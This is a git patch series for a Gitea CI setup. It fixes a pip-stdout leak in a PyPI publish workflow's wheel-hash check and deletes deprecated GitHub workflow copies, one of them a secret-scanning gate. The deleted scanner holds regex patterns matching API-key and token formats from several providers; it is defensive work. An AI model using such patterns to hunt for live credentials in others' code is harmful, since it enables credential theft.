From 84ffa2da6cf60c454ddf42fa13fad136aee9b170 Mon Sep 17 00:00:00 2001 From: claude-ceo-assistant Date: Sun, 10 May 2026 19:51:18 -0700 Subject: [PATCH 1/7] fix(ci): cascade wait-step SHA capture leaked pip stdout (4th defect) Run 5196 (2026-05-11 02:46Z, first-ever successful publish) succeeded the publish job but failed the cascade job at the wait-for-PyPI- propagation step: ::error::PyPI propagated 0.1.130 but wheel content SHA256 mismatch. ::error::Expected: 536b123816f3c7fb54690b80be482b28cabd1874690e9e93d8586af3864c7fba ::error::Got: Collecting molecule-ai-workspace-runtime==0.1.130 ::error::Fastly may be serving stale content. Refusing to fan out cascade. The 'Got:' is pip's own stdout, not a SHA. Root cause: HASH=$(python -m pip download ... 2>/dev/null && sha256sum ... | awk ...) The shell pipeline captures BOTH commands' stdout into $HASH. `2>/dev/null` only silences stderr, not stdout. pip download writes 'Collecting ...' to stdout by default, so it leaks into HASH ahead of sha256sum's output. Fix: split into two steps, redirect pip stdout to /dev/null explicitly, capture only sha256sum's output into HASH. Impact: cascade-to-8-template-repos failed, but PyPI publish itself succeeded. Users (workspace-template-* maintainers) can pin manually via 'docker build --build-arg RUNTIME_VERSION=X.Y.Z' until cascade is healed. hongming-pc is doing exactly this for the plugins_registry rollout. 4th and likely last workflow defect after #353, #355, #357. Refs: #351, #353, #355, #357, #348 Q3 --- .gitea/workflows/publish-runtime.yml | 24 +++++++++++++++++------- 1 file changed, 17 insertions(+), 7 deletions(-) diff --git a/.gitea/workflows/publish-runtime.yml b/.gitea/workflows/publish-runtime.yml index cefd9259..fe46e812 100644 --- a/.gitea/workflows/publish-runtime.yml +++ b/.gitea/workflows/publish-runtime.yml @@ -207,13 +207,23 @@ jobs: # Stage (b): download wheel + SHA256 compare against what we built. # Catches Fastly stale-content serving old bytes under a new version URL. - HASH=$(python -m pip download \ - --no-deps \ - --no-cache-dir \ - --dest /tmp/wheel-probe \ - "molecule-ai-workspace-runtime==${RUNTIME_VERSION}" \ - 2>/dev/null \ - && sha256sum /tmp/wheel-probe/*.whl | awk '{print $1}') + # + # Caught run 5196 (first-ever successful publish, 2026-05-11): the + # previous one-liner `HASH=$(pip download ... && sha256sum ...)` + # captured pip's stdout (`Collecting molecule-ai-workspace-runtime + # ==X.Y.Z`) into HASH, then the SHA comparison failed against the + # leaked `Collecting...` string. `2>/dev/null` silences stderr but + # NOT stdout; pip writes its progress to stdout by default. + # Fix: split into two steps, silence pip's stdout explicitly, capture + # only sha256sum's output into HASH. + python -m pip download \ + --no-deps \ + --no-cache-dir \ + --dest /tmp/wheel-probe \ + --quiet \ + "molecule-ai-workspace-runtime==${RUNTIME_VERSION}" \ + >/dev/null 2>&1 + HASH=$(sha256sum /tmp/wheel-probe/*.whl | awk '{print $1}') if [ "$HASH" != "$EXPECTED_SHA256" ]; then echo "::error::PyPI propagated $RUNTIME_VERSION but wheel content SHA256 mismatch." 
echo "::error::Expected: $EXPECTED_SHA256" From a0da162aeb9bab6bbd5cb11a968d5f2cac19181c Mon Sep 17 00:00:00 2001 From: dev-lead Date: Sun, 10 May 2026 21:10:35 -0700 Subject: [PATCH 2/7] =?UTF-8?q?ci:=20delete=20.github/workflows/=20copies?= =?UTF-8?q?=20that=20are=20mirrored=20in=20.gitea/=20(RFC=20internal#219?= =?UTF-8?q?=20=C2=A71,=20Category=20A)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Sweep companion to PR#372 (ci.yml port). These two .github/workflows/ files have working .gitea/workflows/ twins active on Gitea Actions: - publish-runtime.yml — .gitea/ version is the canonical PyPI publisher (ported 2026-05-10 in issue #206). The .github/ version explicitly marks itself DEPRECATED in its own header comment and is kept "for reference only". The .gitea/ port drops OIDC trusted publisher, workflow_dispatch.inputs, merge_group, and the GitHub-only pypa/gh-action-pypi-publish action. - secret-scan.yml — .gitea/ version is the active branch-protection gate (matches "Secret scan / Scan diff for credential-shaped strings (pull_request)" required check name). The .github/ version retains a workflow_call entry point for reusable cross-repo invocation, but per saved memory feedback_gitea_cross_repo_uses_blocked cross-repo `uses:` is blocked on Gitea 1.22.6 anyway (DEFAULT_ACTIONS_URL=self), so the reusable shape no longer has callers. Both files are silently dead — verified by reading the molecule-core Gitea Actions page (only the 6 .gitea/ workflows appear in the workflow filter sidebar; none of the .github/ files have ever produced a run). Per RFC §1: this PR is a hygiene cleanup. Removing the dead .github/ copies eliminates the ongoing confusion of two workflow files claiming the same job name and converges molecule-core toward a single source of truth under .gitea/. Branch protection on main was checked and does NOT reference any removed file — only the .gitea/ secret-scan and sop-tier-check check names are required. DO NOT MERGE without orchestrator-dispatched Five-Axis review + @hongmingwang chat-go (per feedback_pr_review_via_other_agents). Cross-links: - RFC: molecule-ai/internal#219 - Companion: PR#372 (ci.yml port — Category C-style) Co-Authored-By: Claude Opus 4.7 (1M context) --- .github/workflows/publish-runtime.yml | 446 -------------------------- .github/workflows/secret-scan.yml | 214 ------------ 2 files changed, 660 deletions(-) delete mode 100644 .github/workflows/publish-runtime.yml delete mode 100644 .github/workflows/secret-scan.yml diff --git a/.github/workflows/publish-runtime.yml b/.github/workflows/publish-runtime.yml deleted file mode 100644 index 6118c113..00000000 --- a/.github/workflows/publish-runtime.yml +++ /dev/null @@ -1,446 +0,0 @@ -name: publish-runtime - -# DEPRECATED on Gitea Actions — this file is kept for reference only. -# Gitea Actions reads .gitea/workflows/, not .github/workflows/. -# The canonical version is now: .gitea/workflows/publish-runtime.yml -# That port: -# - Drops OIDC trusted publisher (Gitea has no environments/OIDC) -# - Uses PYPI_TOKEN secret instead of gh-action-pypi-publish -# - Uses ${GITHUB_REF#refs/tags/} instead of github.ref_name -# - Drops staging branch trigger (staging branch does not exist) -# - Drops merge_group trigger (Gitea has no merge queue) -# -# Publishes molecule-ai-workspace-runtime to PyPI from monorepo workspace/. 
-# Monorepo workspace/ is the only source-of-truth for runtime code; this -# workflow is the bridge from monorepo edits to the PyPI artifact that -# the 8 workspace-template-* repos depend on. -# -# Triggered by: -# - Pushing a tag matching `runtime-vX.Y.Z` (the version is derived from -# the tag — `runtime-v0.1.6` publishes `0.1.6`). -# - Manual workflow_dispatch with an explicit `version` input (useful for -# dev/test releases without tagging the repo). -# - Auto: any push to `staging` that touches `workspace/**`. The version -# is derived by querying PyPI for the current latest and bumping the -# patch component. This closes the human-in-loop gap that caused the -# 2026-04-27 RuntimeCapabilities ImportError outage — adapter symbol -# additions in workspace/adapters/base.py used to require an operator -# to remember to publish; now the merge itself triggers the publish. -# -# The workflow: -# 1. Runs scripts/build_runtime_package.py to copy workspace/ → -# build/molecule_runtime/ with imports rewritten (`a2a_client` → -# `molecule_runtime.a2a_client`). -# 2. Builds wheel + sdist with `python -m build`. -# 3. Publishes to PyPI via the PyPA Trusted Publisher action (OIDC). -# No static API token is stored — PyPI verifies the workflow's -# OIDC claim against the trusted-publisher config registered for -# molecule-ai-workspace-runtime (molecule-ai/molecule-core, -# publish-runtime.yml, environment pypi-publish). -# -# After publish: the 8 template repos pick up the new version on their -# next image rebuild (their requirements.txt pin -# `molecule-ai-workspace-runtime>=0.1.0`, so any new release is eligible). -# To force-pull immediately, bump the pin in each template repo's -# requirements.txt and merge — that triggers their own publish-image.yml. - -on: - push: - tags: - - "runtime-v*" - branches: - - staging - paths: - # Auto-publish when staging gets changes that affect what gets - # published. Path filter ONLY applies to branch pushes — tag pushes - # still fire regardless. - # - # workspace/** is the source-of-truth for runtime code. - # scripts/build_runtime_package.py is the build script — changes to - # it (e.g. a fix to the import rewriter or a manifest emit) directly - # affect what ships in the wheel even if no workspace/ file changes. - # The 2026-04-27 lib/ subpackage incident missed an auto-publish for - # exactly this reason — PR #2174 only changed scripts/ and the - # operator had to remember a manual dispatch. - - "workspace/**" - - "scripts/build_runtime_package.py" - workflow_dispatch: - inputs: - version: - description: "Version to publish (e.g. 0.1.6). Required for manual dispatch." - required: true - type: string - -permissions: - contents: read - -# Serialize publishes so two staging merges landing seconds apart don't -# both compute "latest+1" and race on PyPI upload. The second one waits. 
-concurrency: - group: publish-runtime - cancel-in-progress: false - -jobs: - publish: - runs-on: ubuntu-latest - environment: pypi-publish - permissions: - contents: read - id-token: write # PyPI Trusted Publisher (OIDC) — no PYPI_TOKEN needed - outputs: - version: ${{ steps.version.outputs.version }} - wheel_sha256: ${{ steps.wheel_hash.outputs.wheel_sha256 }} - steps: - - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 - - - uses: actions/setup-python@a309ff8b426b58ec0e2a45f0f869d46889d02405 # v6.2.0 - with: - python-version: "3.11" - cache: pip - - - name: Derive version (tag, manual input, or PyPI auto-bump) - id: version - run: | - if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then - VERSION="${{ inputs.version }}" - elif echo "$GITHUB_REF_NAME" | grep -q "^runtime-v"; then - # Tag is `runtime-vX.Y.Z` — strip the prefix. - VERSION="${GITHUB_REF_NAME#runtime-v}" - else - # Auto-publish from staging push. Query PyPI for the current - # latest and bump the patch component. concurrency: group above - # serializes parallel staging merges so we don't race on the - # bump. If PyPI is unreachable, fail loud — better to skip a - # publish than to overwrite an existing version. - LATEST=$(curl -fsS --retry 3 https://pypi.org/pypi/molecule-ai-workspace-runtime/json \ - | python -c "import sys,json; print(json.load(sys.stdin)['info']['version'])") - MAJOR=$(echo "$LATEST" | cut -d. -f1) - MINOR=$(echo "$LATEST" | cut -d. -f2) - PATCH=$(echo "$LATEST" | cut -d. -f3) - VERSION="${MAJOR}.${MINOR}.$((PATCH+1))" - echo "Auto-bumped from PyPI latest $LATEST -> $VERSION" - fi - if ! echo "$VERSION" | grep -qE '^[0-9]+\.[0-9]+\.[0-9]+(\.dev[0-9]+|rc[0-9]+|a[0-9]+|b[0-9]+|\.post[0-9]+)?$'; then - echo "::error::version $VERSION does not match PEP 440" - exit 1 - fi - echo "version=$VERSION" >> "$GITHUB_OUTPUT" - echo "Publishing molecule-ai-workspace-runtime $VERSION" - - - name: Install build tooling - run: pip install build twine - - - name: Build package from workspace/ - run: | - python scripts/build_runtime_package.py \ - --version "${{ steps.version.outputs.version }}" \ - --out "${{ runner.temp }}/runtime-build" - - - name: Build wheel + sdist - working-directory: ${{ runner.temp }}/runtime-build - run: python -m build - - - name: Capture wheel SHA256 for cascade content-verification - # Recorded BEFORE upload so the cascade probe can verify the - # bytes Fastly serves under the new version's URL match what - # we built. Closes a hole left by #2197: that probe verified - # pip can resolve the version (catches propagation lag) but - # not that the wheel content matches (would silently pass a - # Fastly stale-content scenario where the new version's URL - # serves an old wheel binary). - id: wheel_hash - working-directory: ${{ runner.temp }}/runtime-build - run: | - set -eu - WHEEL=$(ls dist/*.whl 2>/dev/null | head -1) - if [ -z "$WHEEL" ]; then - echo "::error::No .whl in dist/ — `python -m build` must have failed silently" - exit 1 - fi - HASH=$(sha256sum "$WHEEL" | awk '{print $1}') - echo "wheel_sha256=${HASH}" >> "$GITHUB_OUTPUT" - echo "Local wheel SHA256 (pre-upload): ${HASH}" - echo "Wheel filename: $(basename "$WHEEL")" - - - name: Verify package contents (sanity) - working-directory: ${{ runner.temp }}/runtime-build - # Smoke logic lives in scripts/wheel_smoke.py so the same gate runs - # at both PR-time (runtime-prbuild-compat.yml) and publish-time - # (here). 
Splitting the smoke across two heredocs let them drift - # apart historically — one script keeps them locked. - run: | - python -m twine check dist/* - python -m venv /tmp/smoke - /tmp/smoke/bin/pip install --quiet dist/*.whl - /tmp/smoke/bin/python "$GITHUB_WORKSPACE/scripts/wheel_smoke.py" - - - name: Publish to PyPI (Trusted Publisher / OIDC) - # PyPI side is configured: project molecule-ai-workspace-runtime → - # publisher molecule-ai/molecule-core, workflow publish-runtime.yml, - # environment pypi-publish. The action mints a short-lived OIDC - # token and exchanges it for a PyPI upload credential — no static - # API token in this repo's secrets. - uses: pypa/gh-action-pypi-publish@cef221092ed1bacb1cc03d23a2d87d1d172e277b # release/v1 - with: - packages-dir: ${{ runner.temp }}/runtime-build/dist/ - - cascade: - # After PyPI accepts the upload, fan out a repository_dispatch to each - # template repo so they rebuild their image against the new runtime. - # Each template's `runtime-published.yml` receiver picks up the event, - # pulls the new PyPI version (their requirements.txt pin is `>=`), and - # republishes ghcr.io/molecule-ai/workspace-template-<name>:latest. - # - # Soft-fail per repo: if one template's dispatch fails (perms missing, - # repo archived, etc.) we still try the others and surface the failures - # in the workflow summary instead of aborting the whole cascade. - needs: publish - runs-on: ubuntu-latest - steps: - - name: Wait for PyPI to propagate the new version - # PyPI accepts the upload, then takes a few seconds to make the - # new version visible across all THREE surfaces pip touches: - # 1. /pypi/<package>/<version>/json — metadata endpoint - # 2. /simple/<package>/ — pip's primary download index - # 3. files.pythonhosted.org — CDN-fronted wheel binary - # Each has its own cache. The previous check polled only (1) - # and would let the cascade fire while (2) or (3) still served - # the previous version, so downstream `pip install` resolved - # to the old wheel. Docker layer cache then locked that stale - # resolution in for subsequent rebuilds (the cache trap that - # bit us five times in one night). - # - # Two-stage probe per poll: - # (a) `pip install --no-cache-dir PACKAGE==VERSION` — succeeds - # only when the version is resolvable. Catches surface (1) - # and (2) propagation lag. - # (b) `pip download` of the same wheel + SHA256 compare against - # the just-built dist's hash. Catches surface (3) lag AND - # Fastly serving stale content under the new version's URL - # (a separate Fastly-corruption mode that pip-install alone - # can't see, since pip install resolves+unpacks against - # whatever bytes Fastly returns and never inspects them). - # Both must pass before the cascade fans out. - # - # The venv is reused across polls; only `pip install`/`pip - # download` run in the loop, with --force-reinstall + - # --no-cache-dir so the previous poll's cached state doesn't - # mask propagation lag. - env: - RUNTIME_VERSION: ${{ needs.publish.outputs.version }} - EXPECTED_SHA256: ${{ needs.publish.outputs.wheel_sha256 }} - run: | - set -eu - if [ -z "$EXPECTED_SHA256" ]; then - echo "::error::publish job did not expose wheel_sha256 — cannot verify wheel content. Refusing to fan out cascade." - exit 1 - fi - python -m venv /tmp/propagation-probe - PROBE=/tmp/propagation-probe/bin - $PROBE/pip install --upgrade --quiet pip - # Poll budget: 30 attempts × (~3-5s pip install + ~3s pip - # download + 4s sleep) ≈ 5-6 min wall on a slow GH runner.
- # Generous vs PyPI's typical few-seconds propagation; - # failures past this are signal of a real PyPI / Fastly - # issue, not just lag. - for i in $(seq 1 30); do - # Stage (a): can pip resolve and install the version? - if $PROBE/pip install \ - --quiet \ - --no-cache-dir \ - --force-reinstall \ - --no-deps \ - "molecule-ai-workspace-runtime==${RUNTIME_VERSION}" \ - >/dev/null 2>&1; then - INSTALLED=$($PROBE/pip show molecule-ai-workspace-runtime 2>/dev/null \ - | awk -F': ' '/^Version:/{print $2}') - if [ "$INSTALLED" = "$RUNTIME_VERSION" ]; then - # Stage (b): does Fastly serve the bytes we uploaded? - # `pip download` writes the actual .whl file to disk so - # we can sha256sum it (vs `pip install` which unpacks - # and discards). - rm -rf /tmp/probe-dl - mkdir -p /tmp/probe-dl - if $PROBE/pip download \ - --quiet \ - --no-cache-dir \ - --no-deps \ - --dest /tmp/probe-dl \ - "molecule-ai-workspace-runtime==${RUNTIME_VERSION}" \ - >/dev/null 2>&1; then - WHEEL=$(ls /tmp/probe-dl/*.whl 2>/dev/null | head -1) - if [ -n "$WHEEL" ]; then - ACTUAL=$(sha256sum "$WHEEL" | awk '{print $1}') - if [ "$ACTUAL" = "$EXPECTED_SHA256" ]; then - echo "::notice::✓ pip resolves AND wheel content matches after ${i} poll(s) (sha256=${EXPECTED_SHA256})" - exit 0 - fi - # Hash mismatch: PyPI accepted our upload but Fastly - # is serving different bytes under the version's URL. - # Most often this is propagation lag of the BINARY - # surface — the version is resolvable but the wheel - # cache hasn't caught up. Retry. - echo "::warning::poll ${i}: wheel content mismatch (got ${ACTUAL:0:12}…, want ${EXPECTED_SHA256:0:12}…) — Fastly likely still serving stale binary, retrying" - fi - fi - fi - fi - sleep 4 - done - echo "::error::pip never resolved molecule-ai-workspace-runtime==${RUNTIME_VERSION} with matching wheel content within ~5 min." - echo "::error::Expected wheel SHA256: ${EXPECTED_SHA256}" - echo "::error::Refusing to fan out cascade against stale or corrupt PyPI surfaces." - exit 1 - - - name: Fan out via push to .runtime-version - env: - # Gitea PAT with write:repository scope on the 8 cascade-active - # template repos. Used here for `git push` (NOT for an API - # dispatch — Gitea 1.22.6 has no repository_dispatch endpoint; - # empirically verified across 6 candidate paths in molecule- - # core#20 issuecomment-913). The push trips each template's - # existing `on: push: branches: [main]` trigger on - # publish-image.yml, which then reads the updated - # .runtime-version via its resolve-version job. - DISPATCH_TOKEN: ${{ secrets.DISPATCH_TOKEN }} - RUNTIME_VERSION: ${{ needs.publish.outputs.version }} - run: | - set +e # don't abort on a single repo failure — collect them all - - # Soft-skip on workflow_dispatch when the token is missing - # (operator ad-hoc test); hard-fail on push so unattended - # publishes can't silently skip the cascade. Same shape as - # the original v1, intentional split per the schedule-vs- - # dispatch hardening 2026-04-28. - if [ -z "$DISPATCH_TOKEN" ]; then - if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then - echo "::warning::DISPATCH_TOKEN secret not set — skipping cascade." - echo "::warning::set it at Settings → Secrets and Variables → Actions, then rerun. Templates will stay on the prior runtime version until either this token is set or each template is rebuilt manually." - exit 0 - fi - echo "::error::DISPATCH_TOKEN secret missing — cascade cannot fan out." 
- echo "::error::PyPI was published, but the 8 template repos will NOT pick up the new version until this token is restored and a republish dispatches the cascade." - echo "::error::set it at Settings → Secrets and Variables → Actions; then re-trigger publish-runtime via workflow_dispatch." - exit 1 - fi - VERSION="$RUNTIME_VERSION" - if [ -z "$VERSION" ]; then - echo "::error::publish job did not expose a version output — cascade cannot fan out" - exit 1 - fi - - # All 9 workspace templates declared in manifest.json. The list - # MUST stay aligned with manifest.json's workspace_templates — - # cascade-list-drift-gate.yml enforces this in CI per the - # codex-stuck-on-stale-runtime invariant from PR #2556. - # Long-term goal: derive this list from manifest.json so it - # can't drift even on a manifest edit (RFC #388 Phase-1). - # - # Per-template publish-image.yml presence is checked at - # cascade-time below: codex doesn't ship one today, so the - # cascade soft-skips it with an informational message rather - # than dropping it from this list (which would re-introduce - # the drift the gate exists to catch). - GITEA_URL="${GITEA_URL:-https://git.moleculesai.app}" - TEMPLATES="claude-code hermes openclaw codex langgraph crewai autogen deepagents gemini-cli" - FAILED="" - SKIPPED="" - - # Configure git identity once. The persona owning DISPATCH_TOKEN - # is the same identity that authored this commit on each - # template; using a generic "publish-runtime cascade" co-author - # trailer in the message keeps the audit trail honest about the - # workflow-driven origin. - git config --global user.name "publish-runtime cascade" - git config --global user.email "publish-runtime@moleculesai.app" - - WORKDIR="$(mktemp -d)" - for tpl in $TEMPLATES; do - REPO="molecule-ai/molecule-ai-workspace-template-$tpl" - CLONE="$WORKDIR/$tpl" - - # Pre-check: skip templates without a publish-image.yml. - # The cascade's job is to trip the template's on-push - # rebuild — if there's no rebuild workflow, pushing a - # .runtime-version commit is just noise on the target - # repo. Use the Gitea contents API (no clone required for - # the probe). 200 = present; 404 = absent. - HTTP=$(curl -sS -o /dev/null -w "%{http_code}" \ - -H "Authorization: token $DISPATCH_TOKEN" \ - "$GITEA_URL/api/v1/repos/$REPO/contents/.github/workflows/publish-image.yml") - if [ "$HTTP" = "404" ]; then - echo "↷ $tpl has no publish-image.yml — soft-skip (informational; manifest still tracks it)" - SKIPPED="$SKIPPED $tpl" - continue - fi - if [ "$HTTP" != "200" ]; then - echo "::warning::$tpl publish-image.yml probe returned HTTP $HTTP — proceeding anyway, push will surface the real failure if any" - fi - - # Use a per-template attempt loop so a transient race (e.g. - # human pushing to the same template at the same instant) - # doesn't lose the cascade. Bounded retries (3) — beyond - # that we surface the failure and let the operator retry. - attempt=0 - success=false - while [ $attempt -lt 3 ]; do - attempt=$((attempt + 1)) - rm -rf "$CLONE" - if ! git clone --depth=1 \ - "https://x-access-token:${DISPATCH_TOKEN}@${GITEA_URL#https://}/$REPO.git" \ - "$CLONE" >/tmp/clone.log 2>&1; then - echo "::warning::clone $tpl attempt $attempt failed: $(tail -n3 /tmp/clone.log)" - sleep 2 - continue - fi - - cd "$CLONE" - echo "$VERSION" > .runtime-version - - # Idempotency guard: if the file already matches, this - # publish is a re-run for a version already cascaded. 
- # Don't push a no-op commit (would spuriously re-trip the - # template's on-push and rebuild for nothing). - if git diff --quiet -- .runtime-version; then - echo "✓ $tpl already at $VERSION — no commit needed (idempotent)" - success=true - cd - >/dev/null - break - fi - - git add .runtime-version - git commit -m "chore: pin runtime to $VERSION (publish-runtime cascade)" \ - -m "Co-Authored-By: publish-runtime cascade " \ - >/dev/null - - if git push origin HEAD:main >/tmp/push.log 2>&1; then - echo "✓ $tpl pushed $VERSION on attempt $attempt" - success=true - cd - >/dev/null - break - fi - - # Likely a non-fast-forward — pull-rebase and retry. - # Don't force-push: that would silently overwrite a racing - # human/cascade commit. - echo "::warning::push $tpl attempt $attempt failed, pull-rebasing: $(tail -n3 /tmp/push.log)" - git pull --rebase origin main >/tmp/rebase.log 2>&1 || true - cd - >/dev/null - done - - if [ "$success" != "true" ]; then - FAILED="$FAILED $tpl" - fi - done - rm -rf "$WORKDIR" - - if [ -n "$FAILED" ]; then - echo "::error::Cascade incomplete after 3 retries each. Failed templates:$FAILED" - echo "::error::PyPI publish succeeded; failed templates lag the new version. Re-run this workflow_dispatch with the same version to retry only the laggers (idempotent — already-cascaded templates skip)." - exit 1 - fi - if [ -n "$SKIPPED" ]; then - echo "Cascade complete: pinned $VERSION on cascade-active templates. Soft-skipped (no publish-image.yml):$SKIPPED" - else - echo "Cascade complete: $VERSION pinned across all manifest workspace_templates." - fi diff --git a/.github/workflows/secret-scan.yml b/.github/workflows/secret-scan.yml deleted file mode 100644 index edea6bf9..00000000 --- a/.github/workflows/secret-scan.yml +++ /dev/null @@ -1,214 +0,0 @@ -name: Secret scan - -# Hard CI gate. Refuses any PR / push whose diff additions contain a -# recognisable credential. Defense-in-depth for the #2090-class incident -# (2026-04-24): GitHub's hosted Copilot Coding Agent leaked a ghs_* -# installation token into tenant-proxy/package.json via `npm init` -# slurping the URL from a token-embedded origin remote. We can't fix -# upstream's clone hygiene, so we gate here. -# -# Also the canonical reusable workflow for the rest of the org. Other -# Molecule-AI repos enroll with a single 3-line workflow: -# -# jobs: -# secret-scan: -# uses: molecule-ai/molecule-core/.github/workflows/secret-scan.yml@staging -# -# Pin to @staging not @main — staging is the active default branch, -# main lags via the staging-promotion workflow. Updates ride along -# automatically on the next consumer workflow run. -# -# Same regex set as the runtime's bundled pre-commit hook -# (molecule-ai-workspace-runtime: molecule_runtime/scripts/pre-commit-checks.sh). -# Keep the two sides aligned when adding patterns. - -on: - pull_request: - types: [opened, synchronize, reopened] - push: - branches: [main, staging] - # Required for GitHub merge queue: the queue's pre-merge CI run on - # `gh-readonly-queue/...` refs needs this check to fire so the queue - # gets a real result instead of stalling forever AWAITING_CHECKS. - merge_group: - types: [checks_requested] - # Reusable workflow entry point for other Molecule-AI repos. 
- workflow_call: - -jobs: - scan: - name: Scan diff for credential-shaped strings - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 - with: - fetch-depth: 2 # need previous commit to diff against on push events - - # For pull_request events the diff base may be many commits behind - # HEAD and absent from the shallow clone. Fetch it explicitly. - - name: Fetch PR base SHA (pull_request events only) - if: github.event_name == 'pull_request' - run: git fetch --depth=1 origin ${{ github.event.pull_request.base.sha }} - - # For merge_group events the queue's pre-merge ref is a commit on - # `gh-readonly-queue/...` whose parent is the queue's base_sha. - # That parent isn't part of the queue branch's shallow clone, so - # we fetch it explicitly. Without this the diff falls through to - # "no BASE → scan entire tree" mode and false-positives on legit - # test fixtures (e.g. canvas/src/lib/validation/__tests__/secret-formats.test.ts). - - name: Fetch merge_group base SHA (merge_group events only) - if: github.event_name == 'merge_group' - run: git fetch --depth=1 origin ${{ github.event.merge_group.base_sha }} - - - name: Refuse if credential-shaped strings appear in diff additions - env: - # Plumb event-specific SHAs through env so the script doesn't - # need conditional `${{ ... }}` interpolation per event type. - # github.event.before/after only exist on push events; - # merge_group has its own base_sha/head_sha; pull_request has - # pull_request.base.sha / pull_request.head.sha. - PR_BASE_SHA: ${{ github.event.pull_request.base.sha }} - PR_HEAD_SHA: ${{ github.event.pull_request.head.sha }} - MG_BASE_SHA: ${{ github.event.merge_group.base_sha }} - MG_HEAD_SHA: ${{ github.event.merge_group.head_sha }} - PUSH_BEFORE: ${{ github.event.before }} - PUSH_AFTER: ${{ github.event.after }} - run: | - # Pattern set covers GitHub family (the actual #2090 vector), - # Anthropic / OpenAI / Slack / AWS. Anchored on prefixes with low - # false-positive rates against agent-generated content. Mirror of - # molecule-ai-workspace-runtime/molecule_runtime/scripts/pre-commit-checks.sh - # — keep aligned. - SECRET_PATTERNS=( - 'ghp_[A-Za-z0-9]{36,}' # GitHub PAT (classic) - 'ghs_[A-Za-z0-9]{36,}' # GitHub App installation token - 'gho_[A-Za-z0-9]{36,}' # GitHub OAuth user-to-server - 'ghu_[A-Za-z0-9]{36,}' # GitHub OAuth user - 'ghr_[A-Za-z0-9]{36,}' # GitHub OAuth refresh - 'github_pat_[A-Za-z0-9_]{82,}' # GitHub fine-grained PAT - 'sk-ant-[A-Za-z0-9_-]{40,}' # Anthropic API key - 'sk-proj-[A-Za-z0-9_-]{40,}' # OpenAI project key - 'sk-svcacct-[A-Za-z0-9_-]{40,}' # OpenAI service-account key - 'sk-cp-[A-Za-z0-9_-]{60,}' # MiniMax API key (F1088 vector — caught only after the fact) - 'xox[baprs]-[A-Za-z0-9-]{20,}' # Slack tokens - 'AKIA[0-9A-Z]{16}' # AWS access key ID - 'ASIA[0-9A-Z]{16}' # AWS STS temp access key ID - ) - - # Determine the diff base. Each event type stores its SHAs in - # a different place — see the env block above. - case "${{ github.event_name }}" in - pull_request) - BASE="$PR_BASE_SHA" - HEAD="$PR_HEAD_SHA" - ;; - merge_group) - BASE="$MG_BASE_SHA" - HEAD="$MG_HEAD_SHA" - ;; - *) - BASE="$PUSH_BEFORE" - HEAD="$PUSH_AFTER" - ;; - esac - - # On push events with shallow clones, BASE may be present in - # the event payload but absent from the local object DB - # (fetch-depth=2 doesn't always reach the previous commit - # across true merges). Try fetching it on demand. If the - # fetch fails — e.g. 
the SHA was force-overwritten — we fall - # through to the empty-BASE branch below, which scans the - # entire tree as if every file were new. Correct, just slow. - if [ -n "$BASE" ] && ! echo "$BASE" | grep -qE '^0+$'; then - if ! git cat-file -e "$BASE" 2>/dev/null; then - git fetch --depth=1 origin "$BASE" 2>/dev/null || true - fi - fi - - # Files added or modified in this change. - if [ -z "$BASE" ] || echo "$BASE" | grep -qE '^0+$' || ! git cat-file -e "$BASE" 2>/dev/null; then - # New branch / no previous SHA / BASE unreachable — check the - # entire tree as added content. Slower, but correct on first - # push. - CHANGED=$(git ls-tree -r --name-only HEAD) - DIFF_RANGE="" - else - CHANGED=$(git diff --name-only --diff-filter=AM "$BASE" "$HEAD") - DIFF_RANGE="$BASE $HEAD" - fi - - if [ -z "$CHANGED" ]; then - echo "No changed files to inspect." - exit 0 - fi - - # Self-exclude: this workflow file legitimately contains the - # pattern strings as regex literals. Without an exclude it would - # block its own merge. - SELF=".github/workflows/secret-scan.yml" - - OFFENDING="" - # `while IFS= read -r` (not `for f in $CHANGED`) so filenames - # containing whitespace don't word-split silently — a path - # with a space would otherwise produce two iterations on - # tokens that aren't real filenames, breaking the - # self-exclude + diff lookup. - while IFS= read -r f; do - [ -z "$f" ] && continue - [ "$f" = "$SELF" ] && continue - if [ -n "$DIFF_RANGE" ]; then - ADDED=$(git diff --no-color --unified=0 "$BASE" "$HEAD" -- "$f" 2>/dev/null | grep -E '^\+[^+]' || true) - else - # No diff range (new branch first push) — scan the full file - # contents as if every line were new. - ADDED=$(cat "$f" 2>/dev/null || true) - fi - [ -z "$ADDED" ] && continue - for pattern in "${SECRET_PATTERNS[@]}"; do - if echo "$ADDED" | grep -qE "$pattern"; then - OFFENDING="${OFFENDING}${f} (matched: ${pattern})\n" - break - fi - done - done <<< "$CHANGED" - - if [ -n "$OFFENDING" ]; then - echo "::error::Credential-shaped strings detected in diff additions:" - # `printf '%b' "$OFFENDING"` interprets backslash escapes - # (the literal `\n` we appended above becomes a newline) - # WITHOUT treating OFFENDING as a format string. Plain - # `printf "$OFFENDING"` is a format-string sink: a filename - # containing `%` would be interpreted as a conversion - # specifier, corrupting the error message (or printing - # `%(missing)` artifacts). - printf '%b' "$OFFENDING" - echo "" - echo "The actual matched values are NOT echoed here, deliberately —" - echo "round-tripping a leaked credential into CI logs widens the blast" - echo "radius (logs are searchable + retained)." - echo "" - echo "Recovery:" - echo " 1. Remove the secret from the file. Replace with an env var" - echo " reference (e.g. \${{ secrets.GITHUB_TOKEN }} in workflows," - echo " process.env.X in code)." - echo " 2. If the credential was already pushed (this PR's commit" - echo " history reaches a public ref), treat it as compromised —" - echo " ROTATE it immediately, do not just remove it. The token" - echo " remains valid in git history forever and may be in any" - echo " log/cache that consumed this branch." - echo " 3. Force-push the cleaned commit (or stack a revert) and" - echo " re-run CI." 
